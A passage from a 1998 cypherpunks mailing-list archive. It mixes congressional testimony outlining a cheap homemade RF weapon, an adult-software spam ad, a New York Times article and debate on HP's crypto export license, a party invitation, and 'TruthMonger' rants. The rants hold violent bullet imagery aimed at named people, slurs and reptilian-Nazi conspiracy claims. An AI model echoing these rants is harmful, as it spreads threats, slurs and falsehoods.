E-bomb and similar RFW information is cited as evidence 
of the spread of the threatening technology.

The hearing evolved from JEC hearing testimony in 
June 1997 which described the threat from RFW,
especially that developed by the Former Soviet Union:

  Magnetohydrodynamic Generator Frequency (MHDGF)
  Explosive Magnetic Generator of Frequency (EMGF)
  Implosive Magnetic Generator of Frequency (IMGF)
  Cylindrical Shock Wave Source (CSWS)
  Spherical Shock Wave Source (SSWS)
  Ferromagnetic Generator of Frequency (FMGF)
  Superconductive Former of Magnetic Field Shock Wave (SFMFSW)
  Piezoelectric Generator of Frequency (PEGF)
  Superconducting Ring Burst Generator (SCRBG)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 28 Feb 1998 05:38:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: Backyard RF Weapon
Message-ID: <1.5.4.32.19980228134202.006d0960@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpt from congressional hearing on RF weapons:

      Mr. David Schriner is the Principal Engineer directed energy studies 
with Electronic Warfare Associates and a recently retired engineer with the 
naval weapons testing facility at China Lake. He has numerous patents, has
received superior service awards, and given technical presentations over 42 
years of civil and military service. He will discuss the difficulty in 
building a RF weapon and the terrorist threat.

[Excerpt]

      In support of the information presented in this testimony and taking 
advantage of the winter's need to work indoors, a unit that uses oil spark-gaps 
was designed, built, and tested. The materials for it were mail-ordered at a
cost of about $500 and about one week was needed to fabricate the mechanical 
hardware. It use two ignition coils and a battery for power, an automobile fuel 
pump and filter for the oil circulation, and commonly available transformer
oil. 
An additional week was required to work out all of the electrical wiring, the 
oil lines, and the general finishing details. This unit was ready for testing 
in two weeks after starting the effort. 

      The signal radiated from the unit was measured and found to be a very 
significant power level that can be compared against available vulnerability
and 
susceptibility levels of military equipment. When the weather permits, this
unit 
will be tested against a set of infrastructure targets at an official test
range. 
>From the measurements and known signal levels, this unit is expected to be 
consistently deadly to many types of infrastructure items at ranges suitable
for 
terrorist usage. 

      This quickly-developed low-cost system could easily be placed in a small 
van and used in a parking lot or directed at buildings that the van was driven 
past. It is highly likely that this type of device would be a very effective 
terrorist system and the findings of its design could be factored into another 
either a larger, higher powered device, or a more advanced design each with 
significantly greater effectiveness. 

      The net result of all of this design, experimentation, fabrication and 
measurement proves that such a weapon system could be made by anyone with an 
engineering degree or even a bright technician with good hardware experience. 
The technical information required can be found in open sources, if not just 
from good common engineering sense. The materials needed are nothing special
and 
if the effort is made, advanced concepts can be made using everyday hardware
such 
as automotive ignition systems. The testing to date has been very limited but
the results of this testing have provided considerable insight to just what is 
vulnerable in infrastructure systems. This insight and work leads to a firm 
opinion that a terrorist would have little trouble developing such technology
and that he would have a high probability of success in the use as an RF weapon 
against our infrastructure elements found in any city or near facilities around 
the country. 

      This work has been done within the proper security guidelines since: 

      1.The models made in my home laboratory/workshop used off-the-shelf
materials 
        and open-source references.
      2.The laboratory tests of this hardware were made in a controlled
environment 
        with the proper security in place.
      3.The results of these tests, the data capabilities, and the target set 
        identities are kept in a facility cleared for classified storage.
      4.The development of any of this hardware is reported on a regular
basis to 
        those with whom I relate at a classified level to assure that they are 
        informed of the work and are able to apply this to their interests and 
        efforts if necessary. Any of this hardware can be used by them for any
        determination of utility to military interests. 

      Work in this area will be continued and an aggressive test and
evaluation of 
these "back yard" techniques and methods will be accomplished. This process
will be 
done in cooperation, and if requested, under the direction of agencies with an 
interest in this non-military weapon related process. The author of this
report will, 
if requested, provide to the Committee further details at a classified level
in the 
proper security environment. 

-----

Full hearing testimony: http://jya.com/rfw-jec.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: VG2Hot <VG2Hot@aol.com>
Date: Sat, 28 Feb 1998 12:58:09 -0800 (PST)
Subject: Well here it is...
Message-ID: <8cd785f9.34f82c14@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


   This really is a blast.  With all these movies coming out about virtual
reality, it's amazing to actually have a virtual reality program like this 
for your own computer.

   The Virtual Girlfriend and Virtual Boyfriend are artificial intelligence
programs for your IBM PC or compatible and also for MACINTOSH. You 
can watch them, talk to them, ask them questions, tell them secrets, and 
relate with them.  Watch them as you ask them to take off different clothes
and guide them through many different activities.  Watch and participate 
in the hottest sexual activities available on computer, including: several
sexual positions, using many unique toys, even bringing in multiple partners.
This is no doubt one of the most realistic, sexually stimulating computer
games available.  They will remember your name, birthday, your likes and 
your dislikes.  Every time you start the program, they say different things, 
and act differently.  Each time, they have a different personality. With the 
VGA digital graphics, the Virtual Girlfriend and Virtual Boyfriend software 
have some of the hottest, sexiest graphics out there.  You can actually 
hear their voice as they talk to you.  This is the first adult software title
that was designed for both heterosexual and homosexual people.  We
would like you to try the actual full copy out before it is put on the market
this spring. It will be sold for 1/7 of the actual price (only $7.95) until we
can get back some information on what people think of the program before
it hits the stores.  Please give it a try and write back any comments.
   Thank you.


     Virtual Girlfriend and Virtual Boyfriend are artificial intelligence 
programs, meaning they are completely interactive.  It would be just like 
if you were talking to someone.  You can actually have simple 
conversations.  Their attitudes change with the different things you say, 
so you can say things that will upset them, and then say things that will 
please them.  The more you play/talk with them, the more you learn what 
they can do, and what they like to do.  It's easy to install and instructions
are easy to follow.

         ~~~~~~~~~~~~~~~~~~~Special Offer~~~~~~~~~~~~~~~~~~~
       *Get two more new and exciting adult games for an additional $13.45*
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          Here are two of the best adult games ever!!

     This is to inform you about the new adult game that VCS Magazine
rated "The best game of "97" and gave an "Outstanding ****" (4 stars).
"The Search for Paradise is no doubt one of the greatest XXX adult games 
available".  The first game where it is as much fun as it is a turn on!
Travel the world to every continent, every country you can think of, and meet
some of the most beautiful women in existence.  These women will treat 
you like a king and obey your every command.  Any sexual wish you can 
think of,  these women know it all.  There is a certain paradise for every
guy out there, and this game will have them all.  This game uses real 
models, digital video, and digital sound to make it as realistic as possible.
You will feel like you're in the same room as the girl you're talking to!!!

     The last adult game we are going to inform you about is the newly
released "Club Celebrity X".  Imagine being in a club with some very 
beautiful, well known, ACTUAL celebrities that with skill, will be making 
you breakfast in bed the next day.  These girls you have seen on television,
magazines, and billboard ads, and now they are on your computer, begging
for action.  Each girl you will recognize and you won't believe your eyes 
when you got them in your own bedroom.  This game is hot, and once you
start playing, you won't be able to stop.  
******************************************************************************
**********
                                (((((((((LIMITED TIME ONLY))))))))
T00 H0T!!  for Virtual girlfriend.... These were too sexually graphic to
include in VG and VB.  These are some of most 
arousing & attractive models ever put in one collection.  You MUST be 18 or 
over to purchase & not easily offened.

******************************************************************************
***********                                             
*Required: 386 or better, 4 meg ram or better, Windows 3.1 or higher 
(Win95 is fine), sound card or CD-rom are optional.  Games are given 
either on CD-rom or compressed 3.5" diskettes.  Required is VGA graphics, 
and a hard drive.  Macintosh requires at least 4 meg of ram.  They will run 
on any IBM or MACINTOSH compatible.  If you are interested and would 
like to order a copy, then you can read the mailing instructions below.  
Games come in an unmarked package and are sent out at most 4 days 
after the order is received.  You are not put on any mailing lists
whatsoever, guaranteed.  ~At your request, the programs can come with
a password protection utility that only allows the program to run when the
correct password is entered.~


To order, 
      please send to:             
                                        C&M PROMOTIONS
                                         6185 Magnolia Ave.
                                             Suite# 360
                                       Riverside CA, 92506
                                    Phone # 1-888-341-1643 

        Please fill out the following form and mail it to the address above.  
              (Feel free to write out the order form by hand, if you wish).
      ________________________________________________________
   __________________________ (Cut here)_________________________

                   send to:             C&M Promotions
                                      6185 Magnolia Ave. #360
                                          Riverside CA, 92506


Your Name __________________________________ Date ___________

Address _____________________________________________________

City ____________________________ State ___ Zip Code ____________

Phones: Home  ___________________E-mail Address _______________

Do you use a?  IBM__  MACINTOSH __
Would you like? 3.5 Disks__ CD ROM__ 
 
(   ) Virtual
Girlfriend..............................................................$7.95
(   ) Virtual
Boyfriend.............................................................$7.95
(   ) Both Virtual Girlfriend and
Boyfriend................................$13.95
(   ) The Search for Paradise & Club Celebrity X......................$13.45
(   ) Too HOT for VG &
VB....................................................$17.50
(   ) Everything!!! The Search for Paradise, Club Celebrity X 
      and Virtual Girlfriend and Virtual
Boyfriend.......................$21.90

                                                             (ADD)
S&H.......$2.00

*money order or check*                        Amount enclosed?________


~Please indicate year of birth___________

Code:3785






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sat, 28 Feb 1998 12:05:27 -0800 (PST)
To: Michael Elder <cypherpunks@toad.com
Subject: Re: HP Crypto Export
In-Reply-To: <3.0.2.32.19980228141822.006aee98@descartes.coker.edu>
Message-ID: <v03102804b11e1e1fd2f8@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:18 AM -0800 2/28/98, Michael Elder wrote:
>>From the NY Times online (www.nytmes.com)
>Hewlett-Packard Granted License
>For Encryption System
>
>By PETER WAYNER

>known as a Security Domain Authority or SDA. In countries, like France,
>that require people to keep a record of keys for unlocking data, the SDA
>would only allow the computers to encrypt information if it complied with
>the laws. In countries with no laws about encryption usage like the United
>States, Germany and Great Britain, the SDA would allow users to encrypt in
>whatever manner they choose.

Until, of course, the U.S. changes its policy.

A constant danger with any of these "solutions" is that they make later
imposition of controls so much easier. Consider the implications of
widespread deployment of the HP-type system (which, BTW, I don't think will
happen in the U.S., or elsewhere).

A simple change in the law and all new tokens (and they must be renewed
yearly, so says HP) will implement the new law.

The camel's nose in the tent strategy.

The HP/IBM product is perniciously evil and should be fought with all
technical and memetic means.

--Tim May

Just Say No to "Big Brother Inside"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^3,021,377   | black markets, collapse of governments.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: BBopper <BBopper@aol.com>
Date: Sat, 28 Feb 1998 09:25:55 -0800 (PST)
To: kirstenk@earthlink.com
Subject: Fwd: Party Invitation
Message-ID: <296051a0.34f84790@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



To: "'bbopper@aol.com'" <bbopper@aol.com>
Subject: Party Invitation
From: "Steer, Dave" <steerd@fleishman.com>
Date: Fri, 27 Feb 1998 16:51:45 -0600
Return-Receipt-To: "Steer, Dave" <steerd@fleishman.com>

> **** KEEP READING -- YOU DON'T WANT TO MISS THIS PARTY!!****
> 
> 
> Join us for the first annual 
> 
> Fleishman-Hillard 
> Technology Practice 'IPO' -- Internet Party Offering
>  
> during Spring Internet World in Los Angeles
> 
> It's happening at Billboard Live on Sunset Boulevard in West Hollywood
> on Tuesday, March 10th from 7:00-11:00 PM
> 
> We've invited our favorite industry bands Where's Julio? (featuring
> founders of Excite) and The Flying Other Brothers, and a couple
> hundred of our friends, colleagues, soulmates and supporters (that
> means YOU) for a night of music, food & drink.  
> 
> Please RSVP by March 6th to Robert Delgado
> (email:delgador@fleishman.com or phone: 415/356-1034), and let us know
> where to snailmail your entry ticket.  
> YOU MUST HAVE AN ENTRY TICKET TO GET IN!!!
> 
> We will also provide shuttle transportation to the party from the Omni
> Hotel in downtown L.A. at 6:30 PM.  Just let us know if you think
> you'll be taking it!
> 
> 
> 
> 
> 
> 
************
Dave Steer
Fleishman-Hillard/SF
595 Market Street, #2700
San Francisco, CA  94105
415/356.1024
steerd@fleishman.com
*************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Elder <melder@descartes.coker.edu>
Date: Sat, 28 Feb 1998 11:21:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: HP Crypto Export
Message-ID: <3.0.2.32.19980228141822.006aee98@descartes.coker.edu>
MIME-Version: 1.0
Content-Type: text/plain



>From the NY Times online (www.nytmes.com)

February 28, 1998




Hewlett-Packard Granted License
For Encryption System 

By PETER WAYNER 

The Commerce Department has granted Hewlett-Packard an export license for
its VerSecure encryption architecture allowing the company and its
licensees to export strong encryption tools, the company announced Friday.
The catch is that the products must take their orders from a central
computer system that will dictate how all the products will behave in each
country. 

The company hopes that the solution would break the deadlock between the
Clinton Administration, which continues to restrict the export of secure
computer technology throughout the world, and the computer industry, which
contends that foreigners are not interested in buying products that don't
protect their secrets. 

The new solution effectively disconnects the problem of distributing
encryption technology from the process of determining the policy for
government access to information. The heart is a new class of trusted
hardware cards and chips that take their orders from a central company
known as a Security Domain Authority or SDA. In countries, like France,
that require people to keep a record of keys for unlocking data, the SDA
would only allow the computers to encrypt information if it complied with
the laws. In countries with no laws about encryption usage like the United
States, Germany and Great Britain, the SDA would allow users to encrypt in
whatever manner they choose. 



------------------------------------------------------------------------
"It is very hardware-specific with the flexibility of software and that
gives us a lot of strength in terms of tamper resistance" 

Feisal Mosleh, 
business development manager at Hewlett-Packard 


------------------------------------------------------------------------



Hewlett-Packard sees the solution as a win for the industry, which will be
able to build one set of hardware and software that can be shipped
throughout the world. The SDA's will set the local rules because the
computers will not encrypt information without first getting permission
from the SDA.

Doug McGowan, one of the director of Hewlett-Packard's efforts, said in a
telephone interview, "Never before has a general purpose cryptography tool
been exportable from the United States, with or without key recovery. We're
opening a huge market for American industry to enable commerce on a
worldwide basis." 

The price for this flexibility is the need for specialized hardware that
treats the SDA as its master. In an ordinary computer, the owner can
control all aspects of what the computer does. This extra hardware will
raise the price of machines and is bound to be more expensive than software
which can be distributed at minimal cost. 

Feisal Mosleh, a business development manager at Hewlett-Packard, pointed
out that specialized hardware can offer faster performance and more
security. "It is very hardware-specific with the flexibility of software
and that gives us a lot of strength in terms of tamper resistance" he said
in a phone interview.

Many security experts continue to point out that general-use microcomputers
and their operating systems are dangerously insecure. In one recent attack,
hackers were able to begin transfers from a bank account by manipulating
accounting software. Off-loading the process to specialized hardware makes
it simpler to ensure that the system is secure because the special hardware
has only one job.

Hewlett-Packard says that it is licensing the architecture to a number of
different computer vendors and announced that IBM, Motorola, CertCo,
Trusted Information System, Microsoft and RSA Data Securities had already
signed licenses. The vendors will be free to choose how they implement the
special computer hardware, but most will probably use firmware with an
embedded microprocessor. The initial version will reportedly include DES,
triple-DES, RSA, RC2, RC4 and Diffie-Hellman algorithms. Each of these
solutions can be sped up by specialized hardware, but only a general
microprocessor can handle all of them with equal agility. 

The specialized hardware will also be tamper-proof to prevent people from
circumventing the commands of the SDA. When an encryption card is first
started up, it cannot begin working until it has received instructions from
an SDA in its country. This information is contained in a "policy token."
Joe Beyers, general manager of Hewlett-Packard's Internet Software business
unit, explained, "The token says, 'You can use this amount of key, this
amount of strength for this amount of time.'"

Beyers went on to say, "The aspect of time allows the government to evolve
their policy. Time limits are one of the attributes that made it attractive
to the U.S. government." It would be possible for a government to change
policy with the system from time to time, perhaps forcing citizens to use
long keys in time of war to protect themselves and then relaxing the policy
after peace emerged. 

In the current plan, policy tokens would be good for one year, forcing
computers to re-register with an SDA in order to keep working. The SDA
would have no control of a token after it was issued and would only be able
to change policies at the renewal. 

The relationship between the SDA and the key recovery program is more
difficult to describe. The SDA would not keep any records of any keys that
would allow the police to eavesdrop on calls. But the policy tokens would
force the embedded hardware to obey the local laws that might include key
recovery. The FBI has asked Congress to mandate key recovery systems that
give it clear access to all communications. 

The yearly interrogation between the SDA and the individual computers does
not mean that the system will be foolproof. Someone could simply carry a
laptop from a country that allows personal privacy to a country with more
invasive laws and use it freely until the policy token runs out. Also, it
may be possible to spoof the token authorization procedure by pretending
that the request came from one country instead of another. 

Some critics found the use of special hardware to be problematic. Jim
Lucier, a policy analyst for the Americans for Tax Reform, a Republican
think tank, pointed out that specialized hardware was ignored by the
marketplace in the past. "None of it ever works" he said, "because the more
obvious solution, which is end-to-end encryption, is already there."

Lucier also pointed out that specialized hardware is more complicated to
engineer and much more expensive to distribute than software. "Atoms cost
more than bits, it just comes down to that," he said. In a press conference
Friday morning, Beyers promised that the new hardware was "months, not
years away" and also promised that the hardware costs would be as low as
possible. 

Marc Rotenberg, director of the Electronic Privacy Information Center,
suggested that replacing the current export control bureaucracy with a
network of SDA's was not a significant advance. "Government efforts to
regulate crypto will only slow the development of commerce," he said.

In fact, the decision by the United States government to grant a license to
Hewlett-Packard's architecture is far from liberating. Companies making
VerSecure products can only ship them to countries approved by the United
States government, a list which at this time is limited to the United
Kingdom, Germany, France, Denmark and Australia. More countries will become
open if and when they create an SDA infrastructure that is acceptable to
the United States. 

Hewlett-Packard has gone to great lengths to prevent rogue nations from
setting up their own unauthorized SDA's by cloning hardware. The
infrastructure uses CertCo's secure certificate servers to restrict the
ability to create the software necessary to build the tokens. Beyers says
that no one person at Hewlett-Packard has the ability to do this in order
to reduce the potential for corruption and theft.

Hewlett-Packard is also working heavily with foreign countries to assure
them that the system does not include back doors that might be accessible
by the United States government. Beyers said that the company had retained
an international group of cryptographic experts to vet the system and allay
any fears of hidden back doors. 

A press release from Hewlett-Packard quoted William A. Reinsch,
undersecretary of commerce, as saying, "We are pleased to support HP's
effort to develop and market encryption products that encourage the use of
key recovery in providing robust, secure encryption. This approval and our
ongoing dialogue with the industry are consistent with the Clinton
Administration's goal of allowing the market to develop recoverable
encryption products."

Peter Wayner at pwayner@nytimes.com welcomes your comments and suggestions.


Copyright 1998 The New York Times Company 












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Sat, 28 Feb 1998 14:10:38 -0800 (PST)
To: cypherpunks@toad.com
Subject: SAHMD 4/0
Message-ID: <009C27DF.0E08A460.45@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


Prologue 4/0 SPACE ALIENS HIDE MY DRUGS
---------------------------------------

A Nuclear Bullet, With *Everyone's* Name On It:
  [Your Name Here]


Excerpt from an interview with Marilyn Manson on NPR:
MM: A lot of the lies spread by Fundamentalist Christians
   about our tour were believed by people because they 
   read them on the InterNet.
    The InterNet is the CB Radio of the 90's. People perceive
   it as a legitimate news source, which it's not.
    Eventually there will need to be some sort of laws or
   something...


Top Ten Ways To Convince The Sheeple The Revolution Is NOW:
10,9,8,.7,6,5,4,3,2...
1. Put Marilyn Manson's name on the first bullet.


"Give me nuclear freedom, or give me death."
~ Patrick Hussein


The TRUTH About Area 51:
  It's a resort-spa for the reptilian Nazis who are shaping
our present and our future, preparing to rule all of mankind
when they emerge from the underground bunkers beneath Los Alamos,
Livermore, Colorado Springs, Muleshoe, Texas, etc., at the end
of the Milleniuum.
  Why can't you buy a straight 2"x4" anymore? The reptilian Nazis
are keeping all of the good stuff for themselves. The reason for
the tight security at Area 51 is not because of secret spy-planes
and the like. The reptilian Nazi's don't want us to know that
they are all driving '56 Chevy's. (Their original plan was to
have earthlings all driving Edsels, but they tried to implement
the plan before their mind-control experiments had proven 
successful.)


Who It Is OK To Put A Fucking Bullet Through Their Head:

Officially Recognized Bad Guys--For the Sheeple, this is Saddam
  Hussein, Timothy McVeigh, Dennis Rodman, paramilitarists, 
  grandmothers who plug other people's parking meters, Branch
  Davidians (but it's a shame about the children), and The 
  Subject Of A Ten-Second Sound-Byte To Be Named Later.
  For Republicans, this is welfare cheats, the homeless, tax
  cheats making less than $100,000 per year, liberals, Ralph
  Nadar, CypherPunks, Alt2600 avocados, the 4 Horsemen, and
  anyone who looks like me.
  For the Democrats, this is the non-avant-guarde wealthy,\j
  liberals consume, Rush Limbaugh, Republican presidents, 
  rednecks, people who drink water straight out of the tap,
  and anyone who looks like me.
  For Kris Kristofferson, this is "People doing something
  dirty, decent folks can frown on..."


"Sunshine is the best disinfectant."
~ Supreme Court Justice Louis D. Brandeis, 1928

"Bullet holes let the sun shine in."
~ Supreme Asshole TruthMonger, 1998


When Existence Is Outlawed, Only Outlaws Will Exist:
  The revolution is now.
  The only question that those who have the balls to
participate in the inevitable chaos which will be needed
to balance the Tao against the current onslaught of
digitally structured reality that is being forced upon
humanity by the new technology being promoted by the
pawns of the reptilian Nazis whose headquarters is deep
within the confines of the AdamAntarctic is: "Whose brain
do I put my first bullet through?"

  For many, the answer will be, "TruthMonger!"
  Nobody likes to hear the truth, and the truth is: We
all deserve to die.
  Not only that, but the extinction of humanity, according
to our current values, epitomizes the crowning glory of
our evolutionary path.

  What places us *above* the other primates and the other
forms of life on our planet? What is it that makes us
special, that deems us worthy of ruling over all other
life forms on the planet Earth?
  It is our ability to control; our ability to master
our environment and the objects and life-forms contained
within its bounds. Ultimately, it is our ability to *kill*
whatever stands in the way of the fulfillment of our desires
and our goals.
  For all of our soul-searching, spiritual posturing, deep
down inside we all know that we live in a predatorial 
universe. Republicans cry out for bigger guns to defend
our way of life from everyone who fails to salute the flag.
Democrats cry out for the press and political leaders to
invent enemies to justify the liberals crying out for
bigger guns to protect us from the 'bad guys.'
  And it's all bullshit...

  The reason we need to launch wars and destroy our
environment is to keep the price of our refrigerators
and our color TV's reasonable--to keep the price of the
dollar high enough that we can feel good about ourselves
for saving a starving child for less than ten cents a day,
while ignoring the fact that an obese Sally Fields could
save more starving children in a week than we possibly 
could in a lifetime, just by donating one of her lunches
to the charity she is promoting.


Think About This, You Stupid Fucking Bastards:
  Why do we need to allow our basic human rights and
freedoms to be compromised?: In order for our hallowed
leaders and our protectors in the law enforcement
community to adequately protect us from the 'bad guys.'
  Why do we need to be protected from the 'bad guys'?:
Because if they win out over the 'good guys', they 
will take away our basic human rights and freedoms.


The Reason TruthMonger Will Die Broke And Alone:
  Because he invested all of his money in ClueServers,
believing that the Sheeple might one day find them
to be of value.

"TV Is Real! (Just go back to sleep, dear.)"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Sat, 28 Feb 1998 14:12:10 -0800 (PST)
To: cypherpunks@toad.com
Subject: SAHMD 5/0
Message-ID: <009C27DF.62CAA3E0.49@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


Prologue 5/0
-------------

The Story Thus Far:
  (Or so we would have you believe...)


It is now commonly known that:
  American overt and covert spook agencies of one sort or 
another monitor--legally and illegally--almost all of
the electronic communications in the world.
  American overt and covert spook agencies, legally and
illegally make and break the finances of nations and
corporations around the world.
  Overt and covert spook agencies of other nations do
exactly the same thing, on differing scales.

  Internationally powerful financial agencies, groups
and individuals make daily decisions affecting the lives
of individuals, societies and nations, based on the
desires and goals of individuals who are above and beyond
the control of any nation or group of nations.
  Joe and Jane Sheeple are not privy to information as
to who, exactly, these people are, or what their ultimate
designs are for our future.

  Human rights and freedoms, throughout the world, are
contingent upon heavily armed governments allowing us
those rights and freedoms which they perceive to be
in our best overall interest.
  Those heavily armed governments are increasingly 
acting in concert with one another, dividing up our
finances, property and our human rights among themselves
at the slightest whim.


If It Prevents Just A Single Starving Biafran Child
>From Exposure To A Picture Of A Naked Breast...:
  This is why 'Higher Authority' (government, business,
a person with a large wallet or a large gun) feels compelled
to 'serve and protect' the Sheeple.
  Of course, this all comes at a cost...

  Own your own home? Bullshit!
  I don't care if you paid cash and have clear title--if you
fail to pay property taxes to men with guns who say that you
*have* to, then you are out on the street, tomorrow.

  Growing organic vegetables? Bullshit!
  Unless you have proper state certification, after having
filled in the mountains of documentation and paid numerous
filing fees, registration fees, incremental fees and 
excremental fees, as well as having paid for a mountain
of testing by an independent (government approved) laboratory, thenyour sorry ass is going to jail if you whisper the word 
"organic" in your sleep.

  Do you have a name? Bullshit!
  I don't care what you call yourself, what your momma calls
you, or what name is on your birth certificate, you are a 
number, and you goddamn well better *have* that fucking
number ready if you want to drive a car, cross the street,
make a purchase, sell something, stand in line to get a
number, or breathe.

NEWS FLASH!!!
[Author's Note: You may want to skip the next paragraph,
 if you have a weak heart, or have suicidal tendencies,
 because it speaks a truth that is too ugly for most of
 us to face, even in the best of times.]
  The ONLY time that the powers-that-be recognize you as
a unique individual with a personality, character and a
history, is when they want to USE you, or FUCK you.

  Trust me, you don't really want to think about this
too much, unless you are prepared to face the truth,
because the more you think about it, the more obviously
true it becomes.
  
  The information you are required to provide in applying
for a driver's license--picture, height, weight, race,
hair and eye color--is for the purpose of connecting you,
and only you, to the number on the license.

  Contributed to Social Security all of your life, and now
you are entitled to collect?
  If you have the wrong numnber, Fuck You! If the government
has misplaced your number, Fuck You! If the government is
using a new numbering system, Fuck You!
  Your name is Joe Sheeple, and you worked at the same job
all of your life, and your employer, your family and your
CongressPerson can all attest to the fact that you paid
your share of SS each and every week, and you are now
old enough to retire? Fuck you! Got a number?

  You are a number. Your number is used to categorize
your position and status in life for use by the government
and business during your journey from the cradle to the
grave.

  Fought for your country in the Gulf War? Picked up some
sort of exotic disease or disability?
  Spare me the detail, pal. It doesn't matter how hard you
fought, how valiantly you risked your life, how many kids
you have to feed, what sort of medical history you can
provide about yourself before, during and after the event.
  Your number gets lumped in with the other numbers who
got sick or disabled, and then the number-crunchers decide
if the country you defended can afford for you all to
be sick and disabled.
  Sorry, pal, but the figures are too high. So you
and all of the other numbers get a big, group,
Fuck You!

  You are a number.
  Trust me on this. If you can't trust 608-335-345, then
who *can* you trust?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Sat, 28 Feb 1998 14:14:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: SAHMD 6/0
Message-ID: <009C27DF.BE4A6840.53@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


PROLOGUE 6/0 -- SPACE ALIENS HIDE MY DRUGS
------------------------------------------

Wasting (Everyone) Away In Mongeritaville:
  A man with a gun came to my door recently, and demanded
that I pony-up thirty dollars to members of his gang's
protection racket. If I refuse to pay, he will be back
with other armed thugs.
  If I resist them, they will kill me.

  Sure, when they drag me in front of one of the big
bosses in their protection racket, I can try to talk
them out of robbing and/or killing me, but it will
inevitably end up with Frank Moretti telling Al Capone,
"If we let this schmuck walk away without ponying-up,
then how are we going to keep the others in line."
  In the end, I either pay up or die. 

  It's all because of my dog...
  "Dog running at large." That's what the first threatening
message from the Town of Bienfait said.
  "Voluntary fine." It also said that--with a veiled hint
that if I refused to 'do the right thing', that I might
find myself having a little 'trouble'.

  I had an uncle who found himself forced to deal with these
kind of thugs when he had a small shop on the bad side of
the tracks in a big city. Then he moved to the 'good side 
of town' and found out that the only difference was that
the vigorish was higher, and the thugs were better dressed.
  It's the American Way (TM)... If you want to be robbed
by a better class of thugs, then you can expect to pay a
little more for being beaten with gold-knuckles, instead
of brass-knuckles, if you're a little late on your payment.


I'm A Funny Guy, Eh?:
  No, I'm serious...
  If I fail to pay the Town of Bienfait thirty dollars
for allowing my dog, whom I have not had a single complaint
about from any of my neighbors or fellow citizens, to 
experience the freedom that should be the birthright of
every living creature, then those who rule over the
land I currently live on (under the authority of armed
enforcers), are willing to put me to death.

  They don't like to kill the goose that laid the golden
egg, Jane or Joe Sheeple, so they prefer to start by
placing them in bondage, kidnapping them, and holding
them prisoner in small cages until they get the message
that they are not to be fucked with.
  If you resist being kidnapped and imprisoned, they have
no choice but to send more and better armed thugs to
overcome your resistance, murdering you if you refuse to
recognize and submit to their authority over you, no 
matter how unjust or uncivilized their decisions and
their actions.

  My dog, Baby, doesn't speak Cherokee, so when the
armed thugs approach, she just barks.
  She barks, "The Revolution Is NOW!"


TownShip of MongerItaville -- Population - 1:
  I have self-incorporated (self-actualized, for you
people living in New Age, California) the Township of
MongerItaville, in my own mind, and voted myself the
Grand Pooh-Bah(Humbug) of the domain it encompasses,
which can be found by reaching behind myself and
grabbing my ass. (Wherever I go, there I am...)
  I was elected unanimusly (not a typo), since in
MongerItaville dogs can vote, but women can't.
  (Sorry, Baby, but I only had the Founding Fathers
to use as a role-model...there weren't any Founding
Mothers.)

  As the sole citizen and the head of government of
MongerItaville, I had to make a decision as to 
whether it was better to attempt to reinvent the
wheel, so to speak, by following the example of
the founders of American democracy, or to take a
more realistic approach and automatically grant
myself all of the same powers as have been assumed
by the current governmental and bureacratic 
representatives of the evolution of freedom and
democracy.
  In the beginning, I decided to do both, no matter
how schizophrenic the results, since it seemed obvious
that anything less would be the equivalent of bending
over for the soap in the shower at the Home For The
Criminally Insane.

  I wrote a 'Realistic Bill of Rights' for the TownShip]
of MongerItaville, including such gems as:
~A well-armed and well-lubricated milita being essential
to the security of my butt-hole, my right to get stinking
fucking drunk and 'Load and Lock' (or whatever) shall not
be a bridge over troubled water.
[Editor's Note: Realistically, the preceeding should
read, "Load (Boom!--"Goddamn, I just blew my foot
off!") and Lock."]
~My right to be secure in my person (especially in the
rear part) and my electronic emmissions (internal and
external) will be the responsibility of no one other
than myself (and possibly Phil Zimmerman and Matt
Blaze).
~I will not discriminate against anyone on the basis
of age, race, sex, sexual orientation, or breed.
(Although I reserve the right to call any living
entity 'old fart', 'nigger', 'slut', 'faggot', or
'mutt', if they--start a sentence with, "Kids
nowdays...'--give me soap, instead of crack, for
my twenty dollars--fuck all of my friends and 
everyone in my band--drop the soap in the shower--
jump into bed before me and take the good pillow.)


Hey! Those Aren't Amendments! Those Are Justifications!:
  I decided on only two amendments. One to my physical
constitution--a double-shot of Jim Beam, and one to
my intellectual Constitution--I'm the government, and
I can do anything I fucking want..."
  I suppose that the latter amendment may no be
politically correct in a Berkeley kind of society,
but at least it is consistent with the recognition
of my right to life, liberty, and pursuit of cynicism.

I May Be A Stupid Fuck, But At Least I'm Not A Stupid Fuck:
  Anyone who thinks I am overreacting reads the daily 
news with their blinders on...
  Remember the old broad in New England whose family 
decided she had to be imprisoned against her will in
a looney bin for observation ("We just want to ask
you a few questions...") because she had put up with
society's bullshit long enough to have earned the
right to be 'eccentric'. (That's what you're called
if your filthy fucking rich and let your toenails
